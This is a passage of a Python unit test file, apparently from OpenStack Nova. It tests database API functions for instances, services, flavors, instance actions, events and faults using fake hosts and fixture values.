fixed_addresses = ['1.1.1.1', '1.1.1.2', '1.1.1.3']
float_addresses = ['2.1.1.1', '2.1.1.2', '2.1.1.3']
instance_uuids = [instance1['uuid'], instance1['uuid'],
instance2['uuid']]
for fixed_addr, float_addr, instance_uuid in zip(fixed_addresses,
float_addresses,
instance_uuids):
db.fixed_ip_create(ctxt, {'address': fixed_addr,
'instance_uuid': instance_uuid})
fixed_id = db.fixed_ip_get_by_address(ctxt, fixed_addr)['id']
db.floating_ip_create(ctxt,
{'address': float_addr,
'fixed_ip_id': fixed_id})
real_float_addresses = \
db.instance_floating_address_get_all(ctxt, instance_uuids[0])
self.assertEqual(set(float_addresses[:2]), set(real_float_addresses))
real_float_addresses = \
db.instance_floating_address_get_all(ctxt, instance_uuids[2])
self.assertEqual(set([float_addresses[2]]), set(real_float_addresses))
self.assertRaises(exception.InvalidUUID,
db.instance_floating_address_get_all,
ctxt, 'invalid_uuid')
def test_instance_stringified_ips(self):
instance = self.create_instance_with_args()
instance = db.instance_update(
self.ctxt, instance['uuid'],
{'access_ip_v4': netaddr.IPAddress('1.2.3.4'),
'access_ip_v6': netaddr.IPAddress('::1')})
self.assertIsInstance(instance['access_ip_v4'], six.string_types)
self.assertIsInstance(instance['access_ip_v6'], six.string_types)
instance = db.instance_get_by_uuid(self.ctxt, instance['uuid'])
self.assertIsInstance(instance['access_ip_v4'], six.string_types)
self.assertIsInstance(instance['access_ip_v6'], six.string_types)
@mock.patch('nova.db.sqlalchemy.api._check_instance_exists',
return_value=None)
def test_instance_destroy(self, mock_check_inst_exists):
ctxt = context.get_admin_context()
values = {
'metadata': {'key': 'value'},
'system_metadata': {'key': 'value'}
}
inst_uuid = self.create_instance_with_args(**values)['uuid']
db.instance_tag_set(ctxt, inst_uuid, ['tag1', 'tag2'])
db.instance_destroy(ctxt, inst_uuid)
self.assertRaises(exception.InstanceNotFound,
db.instance_get, ctxt, inst_uuid)
self.assertIsNone(db.instance_info_cache_get(ctxt, inst_uuid))
self.assertEqual({}, db.instance_metadata_get(ctxt, inst_uuid))
self.assertEqual([], db.instance_tag_get_by_instance_uuid(
ctxt, inst_uuid))
ctxt.read_deleted = 'yes'
self.assertEqual(values['system_metadata'],
db.instance_system_metadata_get(ctxt, inst_uuid))
def test_instance_destroy_already_destroyed(self):
ctxt = context.get_admin_context()
instance = self.create_instance_with_args()
db.instance_destroy(ctxt, instance['uuid'])
self.assertRaises(exception.InstanceNotFound,
db.instance_destroy, ctxt, instance['uuid'])
class InstanceMetadataTestCase(test.TestCase):
"""Tests for db.api.instance_metadata_* methods."""
def setUp(self):
super(InstanceMetadataTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def test_instance_metadata_get(self):
instance = db.instance_create(self.ctxt, {'metadata':
{'key': 'value'}})
self.assertEqual({'key': 'value'}, db.instance_metadata_get(
self.ctxt, instance['uuid']))
def test_instance_metadata_delete(self):
instance = db.instance_create(self.ctxt,
{'metadata': {'key': 'val',
'key1': 'val1'}})
db.instance_metadata_delete(self.ctxt, instance['uuid'], 'key1')
self.assertEqual({'key': 'val'}, db.instance_metadata_get(
self.ctxt, instance['uuid']))
def test_instance_metadata_update(self):
instance = db.instance_create(self.ctxt, {'host': 'h1',
'project_id': 'p1', 'metadata': {'key': 'value'}})
        # This should add a new key/value pair
db.instance_metadata_update(self.ctxt, instance['uuid'],
{'new_key': 'new_value'}, False)
metadata = db.instance_metadata_get(self.ctxt, instance['uuid'])
self.assertEqual(metadata, {'key': 'value', 'new_key': 'new_value'})
# This should leave only one key/value pair
db.instance_metadata_update(self.ctxt, instance['uuid'],
{'new_key': 'new_value'}, True)
metadata = db.instance_metadata_get(self.ctxt, instance['uuid'])
self.assertEqual(metadata, {'new_key': 'new_value'})
class InstanceExtraTestCase(test.TestCase):
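    """Tests for db.api.instance_extra_* methods."""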
def setUp(self):
super(InstanceExtraTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.instance = db.instance_create(self.ctxt, {})
def test_instance_extra_get_by_uuid_instance_create(self):
inst_extra = db.instance_extra_get_by_instance_uuid(
self.ctxt, self.instance['uuid'])
self.assertIsNotNone(inst_extra)
def test_instance_extra_update_by_uuid(self):
db.instance_extra_update_by_uuid(self.ctxt, self.instance['uuid'],
{'numa_topology': 'changed'})
inst_extra = db.instance_extra_get_by_instance_uuid(
self.ctxt, self.instance['uuid'])
self.assertEqual('changed', inst_extra.numa_topology)
def test_instance_extra_update_by_uuid_and_create(self):
sqlalchemy_api.model_query(self.ctxt, models.InstanceExtra).\
filter_by(instance_uuid=self.instance['uuid']).\
delete()
inst_extra = db.instance_extra_get_by_instance_uuid(
self.ctxt, self.instance['uuid'])
self.assertIsNone(inst_extra)
db.instance_extra_update_by_uuid(self.ctxt, self.instance['uuid'],
{'numa_topology': 'changed'})
inst_extra = db.instance_extra_get_by_instance_uuid(
self.ctxt, self.instance['uuid'])
self.assertEqual('changed', inst_extra.numa_topology)
def test_instance_extra_get_with_columns(self):
extra = db.instance_extra_get_by_instance_uuid(
self.ctxt, self.instance['uuid'],
columns=['numa_topology', 'vcpu_model'])
self.assertRaises(SQLAlchemyError,
extra.__getitem__, 'pci_requests')
self.assertIn('numa_topology', extra)
self.assertIn('vcpu_model', extra)
class ServiceTestCase(test.TestCase, ModelsObjectComparatorMixin):
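    """Tests for db.api.service_* methods."""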
def setUp(self):
super(ServiceTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _get_base_values(self):
return {
'host': 'fake_host',
'binary': 'fake_binary',
'topic': 'fake_topic',
'report_count': 3,
'disabled': False,
'forced_down': False
}
def _create_service(self, values):
v = self._get_base_values()
v.update(values)
return db.service_create(self.ctxt, v)
def test_service_create(self):
service = self._create_service({})
self.assertIsNotNone(service['id'])
for key, value in self._get_base_values().items():
self.assertEqual(value, service[key])
def test_service_create_disabled(self):
self.flags(enable_new_services=False)
service = self._create_service({})
self.assertTrue(service['disabled'])
def test_service_destroy(self):
service1 = self._create_service({})
service2 = self._create_service({'host': 'fake_host2'})
db.service_destroy(self.ctxt, service1['id'])
self.assertRaises(exception.ServiceNotFound,
db.service_get, self.ctxt, service1['id'])
self._assertEqualObjects(db.service_get(self.ctxt, service2['id']),
service2, ignored_keys=['compute_node'])
def test_service_update(self):
service = self._create_service({})
new_values = {
'host': 'fake_host1',
'binary': 'fake_binary1',
'topic': 'fake_topic1',
'report_count': 4,
'disabled': True
}
db.service_update(self.ctxt, service['id'], new_values)
updated_service = db.service_get(self.ctxt, service['id'])
for key, value in new_values.items():
self.assertEqual(value, updated_service[key])
def test_service_update_not_found_exception(self):
self.assertRaises(exception.ServiceNotFound,
db.service_update, self.ctxt, 100500, {})
def test_service_update_with_set_forced_down(self):
service = self._create_service({})
db.service_update(self.ctxt, service['id'], {'forced_down': True})
updated_service = db.service_get(self.ctxt, service['id'])
self.assertTrue(updated_service['forced_down'])
def test_service_update_with_unset_forced_down(self):
service = self._create_service({'forced_down': True})
db.service_update(self.ctxt, service['id'], {'forced_down': False})
updated_service = db.service_get(self.ctxt, service['id'])
self.assertFalse(updated_service['forced_down'])
def test_service_get(self):
service1 = self._create_service({})
self._create_service({'host': 'some_other_fake_host'})
real_service1 = db.service_get(self.ctxt, service1['id'])
self._assertEqualObjects(service1, real_service1,
ignored_keys=['compute_node'])
def test_service_get_not_found_exception(self):
self.assertRaises(exception.ServiceNotFound,
db.service_get, self.ctxt, 100500)
def test_service_get_by_host_and_topic(self):
service1 = self._create_service({'host': 'host1', 'topic': 'topic1'})
self._create_service({'host': 'host2', 'topic': 'topic2'})
real_service1 = db.service_get_by_host_and_topic(self.ctxt,
host='host1',
topic='topic1')
self._assertEqualObjects(service1, real_service1)
def test_service_get_by_host_and_binary(self):
service1 = self._create_service({'host': 'host1', 'binary': 'foo'})
self._create_service({'host': 'host2', 'binary': 'bar'})
real_service1 = db.service_get_by_host_and_binary(self.ctxt,
host='host1',
binary='foo')
self._assertEqualObjects(service1, real_service1)
def test_service_get_by_host_and_binary_raises(self):
self.assertRaises(exception.HostBinaryNotFound,
db.service_get_by_host_and_binary, self.ctxt,
host='host1', binary='baz')
def test_service_get_all(self):
values = [
{'host': 'host1', 'topic': 'topic1'},
{'host': 'host2', 'topic': 'topic2'},
{'disabled': True}
]
services = [self._create_service(vals) for vals in values]
disabled_services = [services[-1]]
non_disabled_services = services[:-1]
compares = [
(services, db.service_get_all(self.ctxt)),
(disabled_services, db.service_get_all(self.ctxt, True)),
(non_disabled_services, db.service_get_all(self.ctxt, False))
]
for comp in compares:
self._assertEqualListsOfObjects(*comp)
def test_service_get_all_by_topic(self):
values = [
{'host': 'host1', 'topic': 't1'},
{'host': 'host2', 'topic': 't1'},
{'disabled': True, 'topic': 't1'},
{'host': 'host3', 'topic': 't2'}
]
services = [self._create_service(vals) for vals in values]
expected = services[:2]
real = db.service_get_all_by_topic(self.ctxt, 't1')
self._assertEqualListsOfObjects(expected, real)
def test_service_get_all_by_binary(self):
values = [
{'host': 'host1', 'binary': 'b1'},
{'host': 'host2', 'binary': 'b1'},
{'disabled': True, 'binary': 'b1'},
{'host': 'host3', 'binary': 'b2'}
]
services = [self._create_service(vals) for vals in values]
expected = services[:2]
real = db.service_get_all_by_binary(self.ctxt, 'b1')
self._assertEqualListsOfObjects(expected, real)
def test_service_get_all_by_host(self):
values = [
{'host': 'host1', 'topic': 't11', 'binary': 'b11'},
{'host': 'host1', 'topic': 't12', 'binary': 'b12'},
{'host': 'host2', 'topic': 't1'},
{'host': 'host3', 'topic': 't1'}
]
services = [self._create_service(vals) for vals in values]
expected = services[:2]
real = db.service_get_all_by_host(self.ctxt, 'host1')
self._assertEqualListsOfObjects(expected, real)
def test_service_get_by_compute_host(self):
values = [
{'host': 'host1', 'binary': 'nova-compute'},
{'host': 'host2', 'binary': 'nova-scheduler'},
{'host': 'host3', 'binary': 'nova-compute'}
]
services = [self._create_service(vals) for vals in values]
real_service = db.service_get_by_compute_host(self.ctxt, 'host1')
self._assertEqualObjects(services[0], real_service)
self.assertRaises(exception.ComputeHostNotFound,
db.service_get_by_compute_host,
self.ctxt, 'non-exists-host')
def test_service_get_by_compute_host_not_found(self):
self.assertRaises(exception.ComputeHostNotFound,
db.service_get_by_compute_host,
self.ctxt, 'non-exists-host')
def test_service_binary_exists_exception(self):
db.service_create(self.ctxt, self._get_base_values())
values = self._get_base_values()
values.update({'topic': 'top1'})
self.assertRaises(exception.ServiceBinaryExists, db.service_create,
self.ctxt, values)
def test_service_topic_exists_exceptions(self):
db.service_create(self.ctxt, self._get_base_values())
values = self._get_base_values()
values.update({'binary': 'bin1'})
self.assertRaises(exception.ServiceTopicExists, db.service_create,
self.ctxt, values)
class BaseInstanceTypeTestCase(test.TestCase, ModelsObjectComparatorMixin):
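    """Shared setup and flavor-creation helpers for the flavor test cases."""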
def setUp(self):
super(BaseInstanceTypeTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.user_ctxt = context.RequestContext('user', 'user')
def _get_base_values(self):
return {
'name': 'fake_name',
'memory_mb': 512,
'vcpus': 1,
'root_gb': 10,
'ephemeral_gb': 10,
'flavorid': 'fake_flavor',
'swap': 0,
'rxtx_factor': 0.5,
'vcpu_weight': 1,
'disabled': False,
'is_public': True
}
def _create_flavor(self, values, projects=None):
v = self._get_base_values()
v.update(values)
return db.flavor_create(self.ctxt, v, projects)
class InstanceActionTestCase(test.TestCase, ModelsObjectComparatorMixin):
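    """Tests for the instance action and action event DB API methods."""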
IGNORED_FIELDS = [
'id',
'created_at',
'updated_at',
'deleted_at',
'deleted'
]
def setUp(self):
super(InstanceActionTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _create_action_values(self, uuid, action='run_instance',
ctxt=None, extra=None):
if ctxt is None:
ctxt = self.ctxt
db.instance_create(ctxt, {'uuid': uuid})
values = {
'action': action,
'instance_uuid': uuid,
'request_id': ctxt.request_id,
'user_id': ctxt.user_id,
'project_id': ctxt.project_id,
'start_time': timeutils.utcnow(),
'message': 'action-message'
}
if extra is not None:
values.update(extra)
return values
def _create_event_values(self, uuid, event='schedule',
ctxt=None, extra=None):
if ctxt is None:
ctxt = self.ctxt
values = {
'event': event,
'instance_uuid': uuid,
'request_id': ctxt.request_id,
'start_time': timeutils.utcnow(),
'host': 'fake-host',
'details': 'fake-details',
}
if extra is not None:
values.update(extra)
return values
def _assertActionSaved(self, action, uuid):
"""Retrieve the action to ensure it was successfully added."""
actions = db.actions_get(self.ctxt, uuid)
self.assertEqual(1, len(actions))
self._assertEqualObjects(action, actions[0])
def _assertActionEventSaved(self, event, action_id):
# Retrieve the event to ensure it was successfully added
events = db.action_events_get(self.ctxt, action_id)
self.assertEqual(1, len(events))
self._assertEqualObjects(event, events[0],
['instance_uuid', 'request_id'])
def test_instance_action_start(self):
"""Create an instance action."""
uuid = str(stdlib_uuid.uuid4())
action_values = self._create_action_values(uuid)
action = db.action_start(self.ctxt, action_values)
ignored_keys = self.IGNORED_FIELDS + ['finish_time']
self._assertEqualObjects(action_values, action, ignored_keys)
self._assertActionSaved(action, uuid)
def test_instance_action_finish(self):
"""Create an instance action."""
uuid = str(stdlib_uuid.uuid4())
action_values = self._create_action_values(uuid)
db.action_start(self.ctxt, action_values)
action_values['finish_time'] = timeutils.utcnow()
action = db.action_finish(self.ctxt, action_values)
self._assertEqualObjects(action_values, action, self.IGNORED_FIELDS)
self._assertActionSaved(action, uuid)
def test_instance_action_finish_without_started_event(self):
"""Create an instance finish action."""
uuid = str(stdlib_uuid.uuid4())
action_values = self._create_action_values(uuid)
action_values['finish_time'] = timeutils.utcnow()
self.assertRaises(exception.InstanceActionNotFound, db.action_finish,
self.ctxt, action_values)
def test_instance_actions_get_by_instance(self):
"""Ensure we can get actions by UUID."""
uuid1 = str(stdlib_uuid.uuid4())
expected = []
action_values = self._create_action_values(uuid1)
action = db.action_start(self.ctxt, action_values)
expected.append(action)
action_values['action'] = 'resize'
action = db.action_start(self.ctxt, action_values)
expected.append(action)
# Create some extra actions
uuid2 = str(stdlib_uuid.uuid4())
ctxt2 = context.get_admin_context()
action_values = self._create_action_values(uuid2, 'reboot', ctxt2)
db.action_start(ctxt2, action_values)
db.action_start(ctxt2, action_values)
# Retrieve the action to ensure it was successfully added
actions = db.actions_get(self.ctxt, uuid1)
self._assertEqualListsOfObjects(expected, actions)
def test_instance_actions_get_are_in_order(self):
"""Ensure retrived actions are in order."""
uuid1 = str(stdlib_uuid.uuid4())
extra = {
'created_at': timeutils.utcnow()
}
action_values = self._create_action_values(uuid1, extra=extra)
action1 = db.action_start(self.ctxt, action_values)
action_values['action'] = 'delete'
action2 = db.action_start(self.ctxt, action_values)
actions = db.actions_get(self.ctxt, uuid1)
self.assertEqual(2, len(actions))
self._assertEqualOrderedListOfObjects([action2, action1], actions)
def test_instance_action_get_by_instance_and_action(self):
"""Ensure we can get an action by instance UUID and action id."""
ctxt2 = context.get_admin_context()
uuid1 = str(stdlib_uuid.uuid4())
uuid2 = str(stdlib_uuid.uuid4())
action_values = self._create_action_values(uuid1)
db.action_start(self.ctxt, action_values)
request_id = action_values['request_id']
# NOTE(rpodolyaka): ensure we use a different req id for the 2nd req
action_values['action'] = 'resize'
action_values['request_id'] = 'req-00000000-7522-4d99-7ff-111111111111'
db.action_start(self.ctxt, action_values)
action_values = self._create_action_values(uuid2, 'reboot', ctxt2)
db.action_start(ctxt2, action_values)
db.action_start(ctxt2, action_values)
action = db.action_get_by_request_id(self.ctxt, uuid1, request_id)
self.assertEqual('run_instance', action['action'])
self.assertEqual(self.ctxt.request_id, action['request_id'])
def test_instance_action_event_start(self):
"""Create an instance action event."""
uuid = str(stdlib_uuid.uuid4())
action_values = self._create_action_values(uuid)
action = db.action_start(self.ctxt, action_values)
event_values = self._create_event_values(uuid)
event = db.action_event_start(self.ctxt, event_values)
event_values['action_id'] = action['id']
ignored = self.IGNORED_FIELDS + ['finish_time', 'traceback', 'result']
self._assertEqualObjects(event_values, event, ignored)
self._assertActionEventSaved(event, action['id'])
def test_instance_action_event_start_without_action(self):
"""Create an instance action event."""
uuid = str(stdlib_uuid.uuid4())
event_values = self._create_event_values(uuid)
self.assertRaises(exception.InstanceActionNotFound,
db.action_event_start, self.ctxt, event_values)
def test_instance_action_event_finish_without_started_event(self):
"""Finish an instance action event."""
uuid = str(stdlib_uuid.uuid4())
db.action_start(self.ctxt, self._create_action_values(uuid))
event_values = {
'finish_time': timeutils.utcnow() + datetime.timedelta(seconds=5),
'result': 'Success'
}
event_values = self._create_event_values(uuid, extra=event_values)
self.assertRaises(exception.InstanceActionEventNotFound,
db.action_event_finish, self.ctxt, event_values)
def test_instance_action_event_finish_without_action(self):
"""Finish an instance action event."""
uuid = str(stdlib_uuid.uuid4())
event_values = {
'finish_time': timeutils.utcnow() + datetime.timedelta(seconds=5),
'result': 'Success'
}
event_values = self._create_event_values(uuid, extra=event_values)
self.assertRaises(exception.InstanceActionNotFound,
db.action_event_finish, self.ctxt, event_values)
def test_instance_action_event_finish_success(self):
"""Finish an instance action event."""
uuid = str(stdlib_uuid.uuid4())
action = db.action_start(self.ctxt, self._create_action_values(uuid))
db.action_event_start(self.ctxt, self._create_event_values(uuid))
event_values = {
'finish_time': timeutils.utcnow() + datetime.timedelta(seconds=5),
'result': 'Success'
}
event_values = self._create_event_values(uuid, extra=event_values)
event = db.action_event_finish(self.ctxt, event_values)
self._assertActionEventSaved(event, action['id'])
action = db.action_get_by_request_id(self.ctxt, uuid,
self.ctxt.request_id)
self.assertNotEqual('Error', action['message'])
def test_instance_action_event_finish_error(self):
"""Finish an instance action event with an error."""
uuid = str(stdlib_uuid.uuid4())
action = db.action_start(self.ctxt, self._create_action_values(uuid))
db.action_event_start(self.ctxt, self._create_event_values(uuid))
event_values = {
'finish_time': timeutils.utcnow() + datetime.timedelta(seconds=5),
'result': 'Error'
}
event_values = self._create_event_values(uuid, extra=event_values)
event = db.action_event_finish(self.ctxt, event_values)
self._assertActionEventSaved(event, action['id'])
action = db.action_get_by_request_id(self.ctxt, uuid,
self.ctxt.request_id)
self.assertEqual('Error', action['message'])
def test_instance_action_and_event_start_string_time(self):
"""Create an instance action and event with a string start_time."""
uuid = str(stdlib_uuid.uuid4())
action = db.action_start(self.ctxt, self._create_action_values(uuid))
event_values = {'start_time': timeutils.strtime(timeutils.utcnow())}
event_values = self._create_event_values(uuid, extra=event_values)
event = db.action_event_start(self.ctxt, event_values)
self._assertActionEventSaved(event, action['id'])
def test_instance_action_events_get_are_in_order(self):
"""Ensure retrived action events are in order."""
uuid1 = str(stdlib_uuid.uuid4())
action = db.action_start(self.ctxt,
self._create_action_values(uuid1))
extra1 = {
'created_at': timeutils.utcnow()
}
extra2 = {
'created_at': timeutils.utcnow() + datetime.timedelta(seconds=5)
}
event_val1 = self._create_event_values(uuid1, 'schedule', extra=extra1)
event_val2 = self._create_event_values(uuid1, 'run', extra=extra1)
event_val3 = self._create_event_values(uuid1, 'stop', extra=extra2)
event1 = db.action_event_start(self.ctxt, event_val1)
event2 = db.action_event_start(self.ctxt, event_val2)
event3 = db.action_event_start(self.ctxt, event_val3)
events = db.action_events_get(self.ctxt, action['id'])
self.assertEqual(3, len(events))
self._assertEqualOrderedListOfObjects([event3, event2, event1], events,
['instance_uuid', 'request_id'])
def test_instance_action_event_get_by_id(self):
"""Get a specific instance action event."""
ctxt2 = context.get_admin_context()
uuid1 = str(stdlib_uuid.uuid4())
uuid2 = str(stdlib_uuid.uuid4())
action = db.action_start(self.ctxt,
self._create_action_values(uuid1))
db.action_start(ctxt2,
self._create_action_values(uuid2, 'reboot', ctxt2))
event = db.action_event_start(self.ctxt,
self._create_event_values(uuid1))
event_values = self._create_event_values(uuid2, 'reboot', ctxt2)
db.action_event_start(ctxt2, event_values)
# Retrieve the event to ensure it was successfully added
saved_event = db.action_event_get_by_id(self.ctxt,
action['id'],
event['id'])
self._assertEqualObjects(event, saved_event,
['instance_uuid', 'request_id'])
def test_instance_action_event_start_with_different_request_id(self):
uuid = str(stdlib_uuid.uuid4())
action_values = self._create_action_values(uuid)
action = db.action_start(self.ctxt, action_values)
# init_host case
fake_admin_context = context.get_admin_context()
event_values = self._create_event_values(uuid, ctxt=fake_admin_context)
event = db.action_event_start(fake_admin_context, event_values)
event_values['action_id'] = action['id']
ignored = self.IGNORED_FIELDS + ['finish_time', 'traceback', 'result']
self._assertEqualObjects(event_values, event, ignored)
self._assertActionEventSaved(event, action['id'])
def test_instance_action_event_finish_with_different_request_id(self):
uuid = str(stdlib_uuid.uuid4())
action = db.action_start(self.ctxt, self._create_action_values(uuid))
# init_host case
fake_admin_context = context.get_admin_context()
db.action_event_start(fake_admin_context, self._create_event_values(
uuid, ctxt=fake_admin_context))
event_values = {
'finish_time': timeutils.utcnow() + datetime.timedelta(seconds=5),
'result': 'Success'
}
event_values = self._create_event_values(uuid, ctxt=fake_admin_context,
extra=event_values)
event = db.action_event_finish(fake_admin_context, event_values)
self._assertActionEventSaved(event, action['id'])
action = db.action_get_by_request_id(self.ctxt, uuid,
self.ctxt.request_id)
self.assertNotEqual('Error', action['message'])
class InstanceFaultTestCase(test.TestCase, ModelsObjectComparatorMixin):
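    """Tests for the instance_fault_* methods of the DB API."""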
def setUp(self):
super(InstanceFaultTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _create_fault_values(self, uuid, code=404):
return {
'message': 'message',
'details': 'detail',
'instance_uuid': uuid,
'code': code,
'host': 'localhost'
}
def test_instance_fault_create(self):
"""Ensure we can create an instance fault."""
uuid = str(stdlib_uuid.uuid4())
# Ensure no faults registered for this instance
faults = db.instance_fault_get_by_instance_uuids(self.ctxt, [uuid])
self.assertEqual(0, len(faults[uuid]))
# Create a fault
fault_values = self._create_fault_values(uuid)
db.instance_create(self.ctxt, {'uuid': uuid})
fault = db.instance_fault_create(self.ctxt, fault_values)
ignored_keys = ['deleted', 'created_at', 'updated_at',
'deleted_at', 'id']
self._assertEqualObjects(fault_values, fault, ignored_keys)
# Retrieve the fault to ensure it was successfully added
faults = db.instance_fault_get_by_instance_uuids(self.ctxt, [uuid])
self.assertEqual(1, len(faults[uuid]))
self._assertEqualObjects(fault, faults[uuid][0])
def test_instance_fault_get_by_instance(self):
"""Ensure we can retrieve faults for instance."""
uuids = [str(stdlib_uuid.uuid4()), str(stdlib_uuid.uuid4())]
fault_codes = [404, 500]
expected = {}
# Create faults
for uuid in uuids:
db.instance_create(self.ctxt, {'uuid': uuid})
expected[uuid] = []
for code in fault_codes:
fault_values = self._create_fault_values(uuid, code)
fault = db.instance_fault_create(self.ctxt, fault_values)
expected[uuid].append(fault)
# Ensure faults are saved
faults = db.instance_fault_get_by_instance_uuids(self.ctxt, uuids)
self.assertEqual(len(expected), len(faults))
for uuid in uuids:
self._assertEqualListsOfObjects(expected[uuid], faults[uuid])
def test_instance_faults_get_by_instance_uuids_no_faults(self):
uuid = str(stdlib_uuid.uuid4())
        # An empty list is returned per uuid when no faults exist.
faults = db.instance_fault_get_by_instance_uuids(self.ctxt, [uuid])
expected = {uuid: []}
self.assertEqual(expected, faults)
def test_instance_faults_get_by_instance_uuids_no_uuids(self):
self.mox.StubOutWithMock(query.Query, 'filter')
self.mox.ReplayAll()
faults = db.instance_fault_get_by_instance_uuids(self.ctxt, [])
self.assertEqual({}, faults)
class InstanceTypeTestCase(BaseInstanceTypeTestCase):
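    """Tests for the flavor_* methods of the DB API."""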
def test_flavor_create(self):
flavor = self._create_flavor({})
ignored_keys = ['id', 'deleted', 'deleted_at', 'updated_at',
'created_at', 'extra_specs']
self.assertIsNotNone(flavor['id'])
self._assertEqualObjects(flavor, self._get_base_values(),
ignored_keys)
def test_flavor_create_with_projects(self):
projects = ['fake-project1', 'fake-project2']
flavor = self._create_flavor({}, projects + ['fake-project2'])
access = db.flavor_access_get_by_flavor_id(self.ctxt,
flavor['flavorid'])
self.assertEqual(projects, [x.project_id for x in access])
def test_flavor_destroy(self):
specs1 = {'a': '1', 'b': '2'}
flavor1 = self._create_flavor({'name': 'name1', 'flavorid': 'a1',
'extra_specs': specs1})
specs2 = {'c': '4', 'd': '3'}
flavor2 = self._create_flavor({'name': 'name2', 'flavorid': 'a2',
'extra_specs': specs2})
db.flavor_destroy(self.ctxt, 'name1')
self.assertRaises(exception.FlavorNotFound,
db.flavor_get, self.ctxt, flavor1['id'])
real_specs1 = db.flavor_extra_specs_get(self.ctxt, flavor1['flavorid'])
self._assertEqualObjects(real_specs1, {})
r_flavor2 = db.flavor_get(self.ctxt, flavor2['id'])
self._assertEqualObjects(flavor2, r_flavor2, 'extra_specs')
def test_flavor_destroy_not_found(self):
self.assertRaises(exception.FlavorNotFound,
db.flavor_destroy, self.ctxt, 'nonexists')
def test_flavor_create_duplicate_name(self):
self._create_flavor({})
self.assertRaises(exception.FlavorExists,
self._create_flavor,
{'flavorid': 'some_random_flavor'})
def test_flavor_create_duplicate_flavorid(self):
self._create_flavor({})
self.assertRaises(exception.FlavorIdExists,
self._create_flavor,
{'name': 'some_random_name'})
def test_flavor_create_with_extra_specs(self):
extra_specs = dict(a='abc', b='def', c='ghi')
flavor = self._create_flavor({'extra_specs': extra_specs})
ignored_keys = ['id', 'deleted', 'deleted_at', 'updated_at',
'created_at', 'extra_specs']
self._assertEqualObjects(flavor, self._get_base_values(),
ignored_keys)
self._assertEqualObjects(extra_specs, flavor['extra_specs'])
def test_flavor_get_all(self):
# NOTE(boris-42): Remove base instance types
for it in db.flavor_get_all(self.ctxt):
db.flavor_destroy(self.ctxt, it['name'])
flavors = [
{'root_gb': 600, 'memory_mb': 100, 'disabled': True,
'is_public': True, 'name': 'a1', 'flavorid': 'f1'},
{'root_gb': 500, 'memory_mb': 200, 'disabled': True,
'is_public': True, 'name': 'a2', 'flavorid': 'f2'},
{'root_gb': 400, 'memory_mb': 300, 'disabled': False,
'is_public': True, 'name': 'a3', 'flavorid': 'f3'},
{'root_gb': 300, 'memory_mb': 400, 'disabled': False,
'is_public': False, 'name': 'a4', 'flavorid': 'f4'},
{'root_gb': 200, 'memory_mb': 500, 'disabled': True,
'is_public': False, 'name': 'a5', 'flavorid': 'f5'},
{'root_gb': 100, 'memory_mb': 600, 'disabled': True,
'is_public': False, 'name': 'a6', 'flavorid': 'f6'}
]
flavors = [self._create_flavor(it) for it in flavors]
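        # Python-side equivalents of the DB-level filters, used below to
        # compute the expected result set for every filter combination.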
lambda_filters = {
'min_memory_mb': lambda it, v: it['memory_mb'] >= v,
'min_root_gb': lambda it, v: it['root_gb'] >= v,
'disabled': lambda it, v: it['disabled'] == v,
'is_public': lambda it, v: (v is None or it['is_public'] == v)
}
mem_filts = [{'min_memory_mb': x} for x in [100, 350, 550, 650]]
root_filts = [{'min_root_gb': x} for x in [100, 350, 550, 650]]
disabled_filts = [{'disabled': x} for x in [True, False]]
is_public_filts = [{'is_public': x} for x in [True, False, None]]
def assert_multi_filter_flavor_get(filters=None):
if filters is None:
filters = {}
expected_it = flavors
for name, value in filters.items():
filt = lambda it: lambda_filters[name](it, value)
expected_it = list(filter(filt, expected_it))
real_it = db.flavor_get_all(self.ctxt, filters=filters)
self._assertEqualListsOfObjects(expected_it, real_it)
# no filter
assert_multi_filter_flavor_get()
# test only with one filter
for filt in mem_filts:
assert_multi_filter_flavor_get(filt)
for filt in root_filts:
assert_multi_filter_flavor_get(filt)
for filt in disabled_filts:
assert_multi_filter_flavor_get(filt)
for filt in is_public_filts:
assert_multi_filter_flavor_get(filt)
# test all filters together
for mem in mem_filts:
for root in root_filts:
for disabled in disabled_filts:
for is_public in is_public_filts:
filts = {}
for f in (mem, root, disabled, is_public):
filts.update(f)
assert_multi_filter_flavor_get(filts)
def test_flavor_get_all_limit_sort(self):
def assert_sorted_by_key_dir(sort_key, asc=True):
sort_dir = 'asc' if asc else 'desc'
results = db.flavor_get_all(self.ctxt, sort_key='name',
sort_dir=sort_dir)
# Manually sort the results as we would expect them
expected_results = sorted(results,
key=lambda item: item['name'],
reverse=(not asc))
self.assertEqual(expected_results, results)
def assert_sorted_by_key_both_dir(sort_key):
assert_sorted_by_key_dir(sort_key, True)
assert_sorted_by_key_dir(sort_key, False)
for attr in ['memory_mb', 'root_gb', 'deleted_at', 'name', 'deleted',
'created_at', 'ephemeral_gb', 'updated_at', 'disabled',
'vcpus', 'swap', 'rxtx_factor', 'is_public', 'flavorid',
'vcpu_weight', 'id']:
assert_sorted_by_key_both_dir(attr)
def test_flavor_get_all_limit(self):
limited_flavors = db.flavor_get_all(self.ctxt, limit=2)
self.assertEqual(2, len(limited_flavors))
def test_flavor_get_all_list_marker(self):
all_flavors = db.flavor_get_all(self.ctxt)
# Set the 3rd result as the marker
marker_flavorid = all_flavors[2]['flavorid']
marked_flavors = db.flavor_get_all(self.ctxt, marker=marker_flavorid)
# We expect everything /after/ the 3rd result
expected_results = all_flavors[3:]
self.assertEqual(expected_results, marked_flavors)
def test_flavor_get_all_marker_not_found(self):
self.assertRaises(exception.MarkerNotFound,
db.flavor_get_all, self.ctxt, marker='invalid')
def test_flavor_get(self):
flavors = [{'name': 'abc', 'flavorid': '123'},
{'name': 'def', 'flavorid': '456'},
{'name': 'ghi', 'flavorid': '789'}]
flavors = [self._create_flavor(t) for t in flavors]
for flavor in flavors:
flavor_by_id = db.flavor_get(self.ctxt, flavor['id'])
self._assertEqualObjects(flavor, flavor_by_id)
def test_flavor_get_non_public(self):
flavor = self._create_flavor({'name': 'abc', 'flavorid': '123',
'is_public': False})
# Admin can see it
flavor_by_id = db.flavor_get(self.ctxt, flavor['id'])
self._assertEqualObjects(flavor, flavor_by_id)
# Regular user can not
self.assertRaises(exception.FlavorNotFound, db.flavor_get,
self.user_ctxt, flavor['id'])
# Regular user can see it after being granted access
db.flavor_access_add(self.ctxt, flavor['flavorid'],
